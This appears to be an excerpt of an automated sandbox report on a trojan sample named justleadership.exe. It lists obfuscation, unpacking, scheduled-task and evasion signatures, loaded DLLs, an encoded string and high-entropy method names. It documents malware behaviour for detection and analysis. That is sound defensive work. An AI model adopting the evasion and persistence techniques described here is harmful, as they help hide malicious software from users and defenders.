Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: justleadership.exe, -.cs Base64 encoded string: 'ykCFYv5qt2uTcPdi+k2fefUp2EqFc/Zl9UDNUf5z3FeCZOJG6kqTe/lr4AKRc+9Y30yaetVm9FzNeetY0FeTZ+5m9VCCb6Bg/E2pWv5p/k2eLdxi7W2PZv5B61abXvpp/VWTLfxi7Wa4d/ZionCYcv5/1l/NRP5m/WqCZPJp/gK3cv88/lyCScto6lCCf/Rpol6TYsRE7EuEc/Vz3Vabd/JpomqTYt9m7VjNJKg/qA3NV+h0/FSUeuJU/EuAc+k8ylCbZvdi2EqFc/Zl9UCzbutr9kuTZKBl+FuTeu1qokqbefBi7VyFYg=='
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal100.troj.evad.winEXE@4/1@0/1
Source: C:\Users\user\Desktop\justleadership.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\justleadership.exe.log Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: justleadership.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: justleadership.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\justleadership.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: justleadership.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe" Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: justleadership.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: justleadership.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: justleadership.exe Static file information: File size 6369280 > 1048576
Source: justleadership.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x612600
Source: justleadership.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs .Net Code: Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777259)),Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777263))})
.NET source code contains potential unpacker
Source: justleadership.exe, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: justleadership.exe, Eutboveuhzm.cs .Net Code: _E003 System.AppDomain.Load(byte[])
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Yara detected Costura Assembly Loader
Source: Yara match File source: 0.2.justleadership.exe.6ad0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2160604823.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: justleadership.exe PID: 6640, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_069B2E5F pushfd ; retf 0_2_069B2E60
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A44F28 push eax; ret 0_2_06A44F29
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4346B push eax; iretd 0_2_06A4346D
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A94F33 push es; retf 0_2_06A94F7C
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A98F1A push es; retf 0_2_06A98F20
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B66F11 push es; ret 0_2_06B66F20
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B835E2 push ecx; retf 0_2_06B835E3
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B85AA2 push es; retf 0_2_06B85B38
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B85A79 push es; retf 0_2_06B85A9C
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B85B4A push es; ret 0_2_06B85B68
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8B8A0 push es; ret 0_2_06B8B950
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8599E push es; retf 0_2_06B859A4
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06C03E29 pushfd ; ret 0_2_06C03E30
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E768FE push esi; retf 0_2_06E76907
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, url4dHBYRv4DinV2mxi.cs High entropy of concatenated method names: 'FToBudHHBO', 'QS0BhaWAyw', 'daNBfhJypC', 'AP4BThMdbg', 'Fl5Br9ra78', 'BOFBZ8fpP8', 's2KBXNYTTJ', 'CnpBjqolcY', 'o7VBDsKd72', 'NUaB81AYS2'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'U0ennNPk4THDRcVqk3W'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, RmXGCEYe833fceXaGLY.cs High entropy of concatenated method names: 'LcpYCOib37', 'eHCqTSyrsutwaDq6evY', 'Jd1D2byZL5My41Ql3u7', 'dMWA4SyXRnJr1mGBRQD', 'nVssCVyjhodYc7btY9Q', 'zePYJByD6nXCoGG2Oiq', 'ITG0bry81yZAwJ1HlF6', 'Am2H1lyUP0Fcy4FC6R1', 'eUfI7CyE3PMMRTj1kMf', 'WrsZWVyTgjy8woVc5rR'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, mCTrEn2z2fhB72SJbcF.cs High entropy of concatenated method names: 'z2FZtDbGNR', 'uLOZ5JpE7H', 'toSZlp2NC7', 'raVZx4x8Wx', 'sMCZ0s3h9R', 'Gx2ZQrKMAl', 'lHvZLWxpSU', 'N0ehdm8jf6', 'DRsZgU5Y2b', 'MJUZKwyQ7m'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, RjIvudFr6Fj3bWrFWjZ.cs High entropy of concatenated method names: 'urgFXhYqML', 'WToFjNUokq', 'usgcvtywqGTelLrfZN1', 'VoWZ0Cy4kcmf3vLRsYH', 'nH791RyOEmGc1yMjjWR', 'C0OEVnykcGlR3ldyOM6', 'rMGq2Ay1b4wr8T80lou', 'JKYFTeyeSIy3sMD2NGe', 'V6aQBTyNJn0EYd44TBb', 'vLlB9oyC0eHvOSgQ6bZ'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, K5lXLQYbpPLs7Cy7sZ5.cs High entropy of concatenated method names: 'HY5YMJJ5er', 'IOtyr1KM3AsTRqBMKqV', 'jvmqn9K6dhsHlDYEegF', 'JaFRCEKmdU3qMnX49wG', 'PR0MI5K35eP4eq9stw6', 'M7pGnIKWxvKtmEQ7nwU', 'tr2TNMKpdiApgcdAWQC', 'TgLQs1KbJXCmh6ibZ47', 'cr88jbKo6bRwX0eS8jJ'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, FQqLQOYvo9K7kMZ7dEH.cs High entropy of concatenated method names: 'EwaYkGYqMt', 'vlVOrcKHPaC4PJumIBk', 'xNwpy3KzDeiLgZmfv8u', 'ofusQoyGbNs8rQ2IHvc', 'AhTkBJyArJQj8vRVyba', 'irtVpIyVPHc1R9sogIv', 'xhCpfgyqRo7vrT2VKOL', 'HnrHvPy7gnCn1agivpt', 'YN301ayijlWW2axOSqi', 'WUsYOcyBJSVcLCMaiDH'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, UVyr1uUeGgqQycKKbb.cs High entropy of concatenated method names: 'sE2t85lsK', 'Jhr5Cby6x', 'Jf9x9lXnW', 'dJxluROf3', 'GrwIFmxidWw82L5HP0i', 'jPBlh7xByJN60mY39PW', 'rYyDIaxIBX2pOsLutlk', 'aJ8AEdxcDTl8RDTHlrE', 'qlo7TgxYrjrWUddf06A', 'lR8wBLxq8ZSfrKWsMGN'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, oF4cRViQA2MnNFvgeQW.cs High entropy of concatenated method names: 'MwSig7cek5', 'tMbiEd0e2i69S1WbXMr', 'EWA7oL0NhByPdOfVTR3', 'VZWYnx0CiCsFJCsEql8', 'ESk32o0RWKp00dYMOli', 'RwkCBH0HYaSXDBxu9F0', 'LMSwnL042CNqRhIYMgo', 'HpDtFJ01bp6mHlcP4o8'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, JBMOeuYRYHJniwiOAbg.cs High entropy of concatenated method names: 'e4dYzIvRyZ', 'QbjFAHVcaE', 'msoFGu3HyF', 'inYyl7ylB7VMFJwCfa8', 'CNoSS9ytQG4qeZKyr7T', 'Mko42Vy5mQWKVuYBy5e', 'Ev3ZqsyxT1kfBVJIQQM', 'cIDs0Ty0cHnQg6jROFc'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, P2NQ5phXim7fiptqdX.cs High entropy of concatenated method names: 'YDlESIE8d', 'OYcTnsfwA', 'rjoZ6gSog', 'AF3X3GrOa', 'euUf8BYNF', 'jgmOPrleo1d08c4C0IO', 'fVJteFlNUqAK0951DNu', 'cccYYylCZVsB5gku9pT', 'LJVD59lR8XYAblLfDSS', 'beGnkQlHSnp1dpQ4hhU'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, uN1Y14iMJqSiYBGmnt7.cs High entropy of concatenated method names: 'Kaoim8YcYD', 'ShMi3fdELB', 'JbTiWt7X5y', 'j2IGiXQmrsJfY4cvf1V', 'fLimbjQ34wRQkpZPpN8', 'KJMqIrQMuCVkUuA12WI', 'FOhA1rQ6NBi2YZUQnhM', 'rv35qNQWNUPmA5dfAuu', 'R8UU6LQpYyqdo3eqhSa', 'syRiq3QsZ908BfSkFou'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs High entropy of concatenated method names: 'cngabyayfPMq8GFSA3o', 'ARvuNfaPmsvuxo4NpAM', 'afi22EGM6x', 'R8L9pLaoGZkiwrw0gg6', 'RE9ubNaMrp9Z50pKV1C', 'SCt9Ida68Dc2B8FahQx', 'QM2A04amWLbL9KlRE1E', 'oF9xdla3PxJdiJifS4J', 'xHFrLkaWSpX8AxrUtdK', 'nBHO2yapcJhhYYq3iKH'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, tutioMi5rSsHCFM8roS.cs High entropy of concatenated method names: 'Oo9ixsYquO', 'ayqi01DrS9', 'X9V57y0nSpKGVqtbXHl', 'XDffTQ0s98pUBf8HFp2', 'MQLCdm0J6T1o48ZaEPD', 'ckUFt30vLILGrmb2AVR', 'Iv1WV70OLULRiyTtyiP', 'aKRJ6x0kfnkrv96dveM'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, U7h5sdBy6DKgXavfsmE.cs High entropy of concatenated method names: 'm1vB6jQraN', 'r04CLUL1xk81xh7ZbF7', 'IigsFiLee5y8bwaIUof', 'FfRGBPLNO1xqdVbUVJZ', 'lwEtO8LwNmfOW9IqiFi', 'YrNFZtL423s3Qiis2Kx', 'M9lqE1LskC8Llmcret3', 'bcqAdyLJQJdtKjnUcCW'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, yYDlN32bGE2YDaEeKnk.cs High entropy of concatenated method names: 'AID2O5gP53', 'cxD2kM9Z9B', 'e5N2wlCIlL', 'lDY241hWvv', 's8M21bkLnZ', 'f8X2e2GvR6', 'HiM2NWNWIF', 'Goq2C1HM14', 'mdj2R5mrrE', 'sWG2HElo04'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, cqVKKxYyN45AjLfeK2Z.cs High entropy of concatenated method names: 'XSGYaFNMag', 'dTwY9vllC5', 'Yix4q7Ku0Lw3M6ugGIU', 'PEOxi3K2x5Pl0OKo4xp', 'CjXZkaKh0LfQWbLM1Mc', 'WBCUqkKSU4LIb1fiYYW', 'ugYT47KfuJPdL6pSyUZ', 'cRL9IWKERYAFKmZin22', 'sidBQ8KTL0SRhK9wSFa', 'yXrNNEKrhwt9MbUZuL1'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, jIlhxliK9NnMpvvFoHZ.cs High entropy of concatenated method names: 'MK8iPcjDUS', 'oqqia2CUAd', 'Ikxi9oZC4D', 'qloibwPl9S', 'UyEio8443P', 'HrRHG8QVtjvjsT35riG', 'X73DGFQqXZjKw7srj9T', 'iFF6YNQ7eJovTeeTjxH', 'HOn2P9QiwMrPFgM6Lr6', 'FPS1nIQB6oSEn8v1BTG'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, dvkauUYtyHA3eecX0hi.cs High entropy of concatenated method names: 'NmHYlyoXRi', 'AFOFbDgwTWKoMioonYX', 'Rwel1ag4BfHyb5BbS7N', 'g9gxCRg1PPaw7YKLFOS', 'wBr6ypger1yRjrMB0sC', 'SpeUqKgN7KQj1sxNJ34', 'cJTjJFgCsYESYTdQdgD', 'FvPfP0gR5Ma5U5bPTfM', 'fPgaHqgO8xysRmtVUwn', 'b3IZcAgk5B19TpMvJJs'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, dtKME3FDc6j3rDD0TG0.cs High entropy of concatenated method names: 'pc4FULwDvx', 'e9PAW8PSefImhjop0qt', 'B638lsPfwmqb9I9lkdV', 'KZvLcZPECSfI2GgZcug', 'Kxd6KAPTHZxKymY8TOU', 'Aue5KxPrFGEik7M8PnG', 'OqOlEPPZ55Ekqe8MG75', 'UhLNtBPXLHj5ZqHwtOx', 'BrykBcP2cpPiIoHE7my', 'XQGLsGPh0TiaWh2BqnI'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, mjkG0pFKuWb2elvhQh0.cs High entropy of concatenated method names: 'XDO34GkTR9', 'eiyo0aadkgQg7BB8xBq', 'G16Ll6atElV7StEqhwV', 'Fl6ZDDa5nrKoBedxD46', 'Go7JI0alMQbyxC1G1sQ', 'F0ftdYa8qOf61QyjtSB', 'iqwjykaUmX0hRoX9QQb', 'U3rTcwaxAoOJAS0d1QO', 'Yd0eOna04LSAbKbNDEM'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, LnXMW5YLnd99XKi9u9o.cs High entropy of concatenated method names: 'aNsYKueKqc', 'nBEs2JK7PZfSOIaB1FG', 'kFjTZfKiwa1FZBe4dY3', 'kFpbgZKBhIo7kUNCdU7', 'jiS78HKImlTNQn7bwWf', 'JAYXT7Kc9DVwHIlYJPN', 'NxtUBnKYC2ZMruDAWxb', 'Vc2wKjKV9MwS6YyGQt3', 'xPV9H2KqLRXq0Wv4Y06'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, nHVKcaVt2psstHNjQvx.cs High entropy of concatenated method names: 'KYnVlt5WWo', 'Ix5K5FxMc6PhVD7bBRY', 'IoBqMTx6RtCRifPXPGh', 'RdRxqFxmyqhVMgerTEH', 'XUDkrax3xSILQ9uMKt3', 'B1ScObxWyhxrvN6qtkD', 'GvdIO0xpLKUe0TGUJ2t', 'Y048I4xspN9NyTdYOwo', 'd3GAqrxJZMPKCWXt1dH', 'lBMEgYxn9QV2gmGXccp'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, bwvNQaFd072Hc2YmXnF.cs High entropy of concatenated method names: 'gtlF5usUP6', 'JNWFlX3dfs', 'e2sJFvPUIIGhx6GfKOq', 'jPoUChPdPd3Ood2PbY0', 'kJ10EmPtgyf4w4ofWrY', 'lcaY1SPDdvv37scy1N8', 'BIPUfqP8OWt1kr3qdmU', 'KnKyhwP53tuGyPthV3H', 'nr9lNHPlYEexcicISrj', 'msyPg9PxeOl3rRRtfCE'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, BQX11lY6oX7kEem0G3x.cs High entropy of concatenated method names: 'GKFYp2IpK5', 'GmkYsrMZI0', 'Ql4Y3xB5lY', 'dMSYW6lZkk', 'ljCumkKvrW2WJlr5XGU', 'h6TrcMKO7iCTVSWb2cd', 'Mf8MBtKkBJTFnvI7xT4', 'l56D0PKw2EAH1OuwBHQ', 'jijrL0K4NVPotL1hPDp', 'vgCcqXK1O3ZNlnqv9iA'
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
